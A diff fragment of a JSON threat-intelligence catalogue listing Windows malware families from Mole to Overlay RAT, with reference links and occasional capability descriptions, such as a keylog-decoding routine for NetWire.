"https://www.cert.pl/en/news/single/mole-ransomware-analysis-and-decryptor/" + ] + }, + "uuid": "aaeaf9ee-2f3d-4141-9d45-ec383ba8445f", + "value": "Mole", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader", + "http://www.clearskysec.com/iec/", + "https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/26000/PD26760/en_US/McAfee_Labs_Threat_Advisory_GazaCybergang.pdf" + ] + }, + "uuid": "b50408c3-6676-4d3f-8a97-9114c215b67a", + "value": "Molerat Loader", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CoinMiner" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.monero_miner", + "https://www.welivesecurity.com/2017/09/28/monero-money-mining-malware/" + ] + }, + "uuid": "c57a4168-cd09-4611-a665-bbcede80f42b", + "value": "Monero Miner", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moonwind", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-trochilus-rat-new-moonwind-rat-used-attack-thai-utility-organizations/" + ] + }, + "uuid": "8465177f-16c8-47fc-a4c8-f4c0409fe460", + "value": "MoonWind", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine" + ] + }, + "uuid": "9de41613-7762-4a88-8e9a-4e621a127f32", + "value": "Morphine", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.morto", + "http://contagiodump.blogspot.com/2011/08/aug-28-morto-tsclient-rdp-worm-with.html", + "https://www.f-secure.com/weblog/archives/00002227.html", + "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Morto.A" + ] + }, + "uuid": "c931dc7d-9373-4545-911c-ad5589670c40", + "value": "Morto", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mosquito", + "https://www.welivesecurity.com/wp-content/uploads/2018/01/ESET_Turla_Mosquito.pdf", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/" + ] + }, + "uuid": "663df641-d396-4e93-93bd-bb9609ceb0ba", + "value": "Mosquito", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.moure" + ] + }, + "uuid": "bd3468e4-5e00-46e6-a884-6eda1b246394", + "value": "Moure", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mozart", + "https://securitykitten.github.io/2015/01/11/the-mozart-ram-scraper.html" + ] + }, + "uuid": "dde61acb-8c0f-4a3a-8450-96e233f2ddc1", + "value": "mozart", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpk", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ] + }, + "uuid": "a37c826a-bb30-49fb-952a-63b1cab366c3", + "value": "MPK", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mpkbot", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf" + ] + }, + "uuid": "2363dc9f-822a-4581-8d5f-1fc436e70621", + "value": "MPKBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", + "https://www.pandasecurity.com/mediacenter/malware/multigrain-malware-pos/" + ] + }, + "uuid": "c513c490-7c76-42ab-a51f-cc780faa7146", + "value": "Multigrain POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.murkytop", + "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" + ] + }, + "uuid": "2685ea45-06f4-46e0-9397-eff8844db855", + "value": "murkytop", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.murofet" + ] + }, + "uuid": "f7081626-130a-48d5-83a9-759b3ef198ec", + "value": "Murofet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mutabaha", + "http://vms.drweb.ru/virus/?_is=1&i=8477920" + ] + }, + "uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5", + "value": "Mutabaha", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader", + "https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators", + "http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/" + ] + }, + "uuid": "ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed", + "value": "MyKings Spreader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.mylobot", + "https://www.deepinstinct.com/2018/06/20/meet-mylobot-a-new-highly-sophisticated-never-seen-before-botnet-thats-out-in-the-wild/" + ] + }, + "uuid": "98d375cb-f940-4bc7-a61e-f47bdcdc48e2", + "value": "MyloBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.n40", + "https://www.slideshare.net/elevenpaths/n40-the-botnet-created-in-brazil-which-evolves-to-attack-the-chilean-banking-sector" + ] + }, + "uuid": "6f0109a5-7cec-4a49-8b27-e18ad5c6cae6", + "value": "N40", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur" + ] + }, + "uuid": "ddf63295-cdba-4c70-a4c6-623ba2b5e6dd", + "value": "Nabucur", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nagini", + "http://bestsecuritysearch.com/voldemortnagini-ransomware-virus/" + ] + }, + "uuid": "0ec7d065-3418-43ba-a0cc-1e06471893ad", + "value": "Nagini", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.naikon", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf", + "https://securelist.com/analysis/publications/69953/the-naikon-apt/" + ] + }, + "uuid": "dfb745f1-600a-4d31-a3b0-57bd0a72ac2e", + "value": "Naikon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nanocore", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4", + "value": "Nanocore RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker" + ] + }, + "uuid": "00e1373c-fddf-4b06-9770-e980cc0ada6b", + "value": "NanoLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.narilam", + "http://contagiodump.blogspot.com/2012/12/nov-2012-w32narilam-sample.html", + "https://www.symantec.com/connect/blogs/w32narilam-business-database-sabotage" + ] + }, + "uuid": "f5a262c7-59ed-42d1-884d-f8d29acf353f", + "value": "Narilam", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nautilus", + "https://www.ncsc.gov.uk/alerts/turla-group-malware" + ] + }, + "uuid": "d8295eba-60ef-4900-8091-d694180de565", + "value": "Nautilus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat", + "https://blog.talosintelligence.com/2018/05/navrat.html?m=1" + ] + }, + "uuid": "ec0cad2c-0c13-491a-a869-1dc1758c8872", + "value": "NavRAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "nucurs" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs", + "https://blog.avast.com/botception-with-necurs-botnet-distributes-script-with-bot-capabilities-avast-threat-labs", + "https://www.bitsighttech.com/blog/necurs-proxy-module-with-ddos-features", + "http://blog.talosintelligence.com/2017/03/necurs-diversifies.html", + "https://www.blueliv.com/wp-content/uploads/2018/07/Blueliv-Necurs-report-2017.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/necurs-evolves-to-evade-spam-detection-via-internet-shortcut-file/", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Necurs-Recurs/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/the-new-face-of-necurs-noteworthy-changes-to-necurs-behaviors", + "https://www.cert.pl/en/news/single/necurs-hybrid-spam-botnet/", + "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/" + ] + }, + "uuid": "53ad08a6-cca9-401a-a6da-3c0bff2890eb", + "value": "Necurs", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Nemain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemim", + "https://securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf" + ] + }, + "uuid": "5ce7906e-b1fd-4860-b3e2-ac9c72033428", + "value": "Nemim", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netc", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "0bc03bfa-1439-4162-bb33-ec9f8f952ee5", + "value": "NetC", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ScoutEagle" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neteagle", + "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" + ] + }, + "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", + "value": "NETEAGLE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger", + "https://labs.bitdefender.com/2017/05/inside-netrepser-a-javascript-based-targeted-attack/" + ] + }, + "uuid": "7c6ed154-3232-4b7a-80c3-8052ce0c7333", + "value": "Netrepser", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat", + "http://www.netsupportmanager.com/index.asp", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-hoeflertext-popups-targeting-google-chrome-users-now-pushing-rat-malware/", + "https://www.bleepingcomputer.com/news/security/hacked-steam-accounts-spreading-remote-access-trojan/" + ] + }, + "uuid": "42562c47-08e1-46bc-962c-28d1831d092b", + "value": "NetSupportManager RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "TravNet" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nettraveler", + "https://www.proofpoint.com/us/threat-insight/post/nettraveler-apt-targets-russian-european-interests", + "https://cdn.securelist.com/files/2014/07/kaspersky-the-net-traveler-part1-final.pdf" + ] + }, + "uuid": "3a26ee44-3224-48f3-aefb-3978c972d928", + "value": "NetTraveler", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Recam" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", + "https://www.circl.lu/pub/tr-23/", + "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", + "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", + "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html" + ] + }, + "uuid": "1acd0c6c-7aff-462e-94ff-7544b1692740", + "value": "NetWire RC", + "description": "Netwire is a RAT, its functionality seems focused on password stealing and keylogging, but includes remote control capabilities as well.\r\n\r\nKeylog files are stored on the infected machine in an obfuscated form. The algorithm is:\r\n\r\n for i in range(0,num_read):\r\n buffer[i] = ((buffer[i]-0x24)^0x9D)&0xFF\r\n" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neuron", + "https://www.ncsc.gov.uk/alerts/turla-group-malware" + ] + }, + "uuid": "101c2c0e-c082-4b5a-b820-2da789e839d9", + "value": "Neuron", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Kasidet" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino", + "http://securitykitten.github.io/an-evening-with-n3utrino/", + "http://malware.dontneedcoffee.com/2014/06/neutrino-bot-aka-kasidet.html", + "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", + "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", + "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", + "https://www.zscaler.com/blogs/research/malicious-office-files-dropping-kasidet-and-dridex", + "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", + "https://securityblog.switch.ch/2017/07/07/94-ch-li-domain-names-hijacked-and-used-for-drive-by/" + ] + }, + "uuid": "3760920e-4d1a-40d8-9e60-508079499076", + "value": "Neutrino", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Jimmy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.neutrino_pos", + "https://securelist.com/neutrino-modification-for-pos-terminals/78839/", + "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" + ] + }, + "uuid": "a954e642-4cf4-4293-a4b0-c82cf2db785d", + "value": "Neutrino POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat", + "https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations" + ] + }, + "uuid": "f18b17a7-9124-42e8-a2f2-4a1a9839aee8", + "value": "NewCore RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newposthings", + "https://asert.arbornetworks.com/lets-talk-about-newposthings/", + "https://www.fireeye.com/blog/threat-research/2016/04/multigrain_pointo.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/", + "http://www.cyintanalysis.com/a-quick-look-at-a-likely-newposthings-sample/" + ] + }, + "uuid": "48f95941-8369-4f80-b2b4-abbacd4bc411", + "value": "NewPosThings", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.newsreels", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "1d32e7c3-840e-4247-b28b-818cb1c4ae7c", + "value": "NewsReels", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CT" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf" + ] + }, + "uuid": "ec50a75e-81f0-48b3-b1df-215eac646421", + "value": "NewCT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot", + "https://twitter.com/benkow_/status/789006720668405760" + ] + }, + "uuid": "de3aae04-130b-4c5f-b67c-03f872e76697", + "value": "Nexster Bot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexus_logger", + "https://twitter.com/PhysicalDrive0/status/842853292124360706", + "http://researchcenter.paloaltonetworks.com/2017/03/unit42-nexuslogger-new-cloud-based-keylogger-enters-market/" + ] + }, + "uuid": "dd1408ac-e288-4389-87f3-7650706f1d51", + "value": "NexusLogger", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ngioweb", + "https://research.checkpoint.com/ramnits-network-proxy-servers/" + ] + }, + "uuid": "35fd764f-8723-4663-9bbf-5b02a64ec02e", + "value": "Ngioweb", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitlove", + "https://www.fireeye.com/blog/threat-research/2015/05/nitlovepos_another.html" + ] + }, + "uuid": "1bdd56fe-beca-4652-af39-87b5e45ae130", + "value": "nitlove", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/Tale-of-the-Two-Payloads-%E2%80%93-TrickBot-and-Nitol/" + ] + }, + "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", + "value": "Nitol", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bladabindi" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", + "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", + "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", + "http://csecybsec.com/download/zlab/20171221_CSE_Bladabindi_Report.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" + ] + }, + "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", + "value": "NjRAT", + "description": "RedPacket Security describes NJRat as \"a remote access trojan (RAT) has capabilities to log keystrokes, access the victim's camera, steal credentials stored in browsers, open a reverse shell, upload/download files, view the victim's desktop, perform process, file, and registry manipulations, and capabilities to let the attacker update, uninstall, restart, close, disconnect the RAT and rename its campaign ID. Through the Command & Control (CnC) server software, the attacker has capabilities to create and configure the malware to spread through USB drives.\"\r\n\r\nIt is supposedly popular with actors in the Middle East. Similar to other RATs, many leaked builders may be backdoored." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nocturnalstealer", + "https://www.proofpoint.com/us/threat-insight/post/thief-night-new-nocturnal-stealer-grabs-data-cheap" + ] + }, + "uuid": "94793dbc-3649-40a4-9ccc-1b32846ecb3a", + "value": "Nocturnal Stealer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nokki", + "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/", + "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/" + ] + }, + "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", + "value": "Nokki", + "description": "Nokki is a RAT type malware which is believe to evolve from Konni RAT. This malware has been tied to attacks containing politically-motivated lures targeting Russian and Cambodian speaking individuals or organizations. Researchers discovered a tie to the threat actor group known as Reaper also known as APT37." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor" + ] + }, + "uuid": "6207668d-af17-44a6-97a2-e1b448264529", + "value": "Nozelesn (Decryptor)", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nransom", + "https://twitter.com/malwrhunterteam/status/910952333084971008", + "https://motherboard.vice.com/en_us/article/yw3w47/this-ransomware-demands-nudes-instead-of-bitcoin", + "https://www.kaspersky.com/blog/nransom-nude-ransomware/18597/" + ] + }, + "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", + "value": "nRansom", + "description": "" + }, + { + "meta": { + "synonyms": [ + "nymain" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim", + "https://www.cert.pl/en/news/single/nymaim-revisited/", + "https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/", + "https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf", + "https://bitbucket.org/daniel_plohmann/idapatchwork" + ] + }, + "uuid": "9b5255c6-44e5-4ec3-bc03-7e00e220c937", + "value": "Nymaim", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2", + "https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/" + ] + }, + "uuid": "c8e8392f-883e-412e-9b0b-02137d0875da", + "value": "Nymaim2", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob" + ] + }, + "uuid": "d8305201-9fec-4e6b-9eec-7ebb756364e2", + "value": "OddJob", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.odinaff", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" + ] + }, + "uuid": "045df65f-77fe-4880-af34-62ca33936c6e", + "value": "Odinaff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer", + "http://blog.talosintelligence.com/2018/02/olympic-destroyer.html", + "https://www.lastline.com/labsblog/olympic-destroyer-south-korea/", + "https://securelist.com/the-devils-in-the-rich-header/84348/", + "https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/", + "https://securelist.com/olympic-destroyer-is-still-alive/86169/", + "http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html", + "https://www.lastline.com/labsblog/attribution-from-russia-with-code/", + "https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/" + ] + }, + "uuid": "f3ba8a50-0105-4aa9-90b2-01df15f50b28", + "value": "Olympic Destroyer", + "description": "Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onekeylocker", + "https://twitter.com/malwrhunterteam/status/1001461507513880576" + ] + }, + "uuid": "838e2a3a-c4cb-4bee-b07f-c97b143c68d6", + "value": "OneKeyLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat", + "https://docs.google.com/spreadsheets/d/1H9_xaxQHpWaa4O_Son4Gx0YOIzlcBWMsdvePFX68EKU/htmlview" + ] + }, + "uuid": "82733125-da67-44ff-b2ac-b16226088211", + "value": "ONHAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke", + "http://contagiodump.blogspot.com/2014/11/onionduke-samples.html", + "https://www.f-secure.com/weblog/archives/00002764.html" + ] + }, + "uuid": "abd10caa-7d4c-4c22-8dae-8d32f13232d7", + "value": "OnionDuke", + "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. " + }, + { + "meta": { + "synonyms": [ + "SBot", + "Onliner" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", + "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" + ] + }, + "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", + "value": "OnlinerSpambot", + "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" + ] + }, + "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", + "value": "OopsIE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", + "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html", + "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", + "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", + "https://forum.malekal.com/viewtopic.php?t=21806" + ] + }, + "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", + "value": "Opachki", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", + "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" + ] + }, + "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", + "value": "OpGhoul", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" + ] + }, + "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", + "value": "OpBlockBuster", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", + "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" + ] + }, + "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", + "value": "OrcaRAT", + "description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", + "https://orcustechnologies.com/", + "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", + "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", + "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors" + ] + }, + "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", + "value": "Orcus RAT", + "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", + "https://www.gdata.de/blog/2017/11/30151-ordinypt", + "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/" + ] + }, + "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", + "value": "Ordinypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", + "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", + "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" + ] + }, + "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", + "value": "Overlay RAT", + "description": "" + }, + { + "meta": 